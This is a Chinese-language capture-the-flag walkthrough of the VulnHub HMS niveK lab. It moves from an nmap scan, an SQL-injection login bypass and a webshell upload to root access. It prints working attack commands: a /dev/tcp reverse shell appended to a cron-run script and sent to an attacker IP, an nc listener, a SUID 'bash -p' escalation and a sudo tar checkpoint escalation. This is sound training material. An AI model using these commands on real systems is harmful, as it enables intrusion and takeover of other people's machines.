https://download.vulnhub.com/hms/niveK.ovahttp://niveK靶场1.下载靶场，打开virtual box导入靶场，网络改为桥接模式，打开虚拟机。

2.nmap先来扫描一下端口：

nmap 192.168.0.17 -p-

扫描出7080为web端口，浏览器打开发现登录页面：

 抓包一下，看到登录页面有sql注入漏洞：

 既然存在sql注入，那么就试了一下万能登录，登录成功，进入了后台：

 

进入后台寻找注入和上传点，另外扫描器找到了一个文件目录，那么只要找到上传方法就可以来写入webshell了，另外sqlmap试了一下，虽然有注入，但是用户名和密码都是加密的，没办法。  靶场使用lamp搭建的。

 

找到了setting.php这个文件上传点：

 上传webshell:

连接一下：

 

连接成功，看了一眼login.php:

使用php-reverse-shell.php进行反弹，上传到文件目录之后，访问一下就可以反弹nc，这样非常方便，如果用命令行反弹，容易出错：

 

python -c "import pty;pty.spawn('/bin/bash')"

第一个flag在home的当前目录：

 

 

使用python提升一下命令行，查找一下SUID文件：

python -c "import pty;pty.spawn('/bin/bash')"

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

 

 

/usr/bin/bash -p

 

现在是登录到eren用户：

cat /etc/crontab

 可以用crontab反弹另一个webshell,通过crontab文件：

bash -c代表从字符串读入命令：

echo "bash -c \"bash -i >& /dev/tcp/192.168.0.16/4556 0>&1\" " >> /home/eren/backup.sh

nc -lvvp 4556

需要等一会才可以反弹成功，这个一个定时执行的命令：

sudo -l

 用tar命令提权：

sudo tar -cf /dev/null /dev/null --checkpoint=1  --checkpoint-action=exec=/bin/bash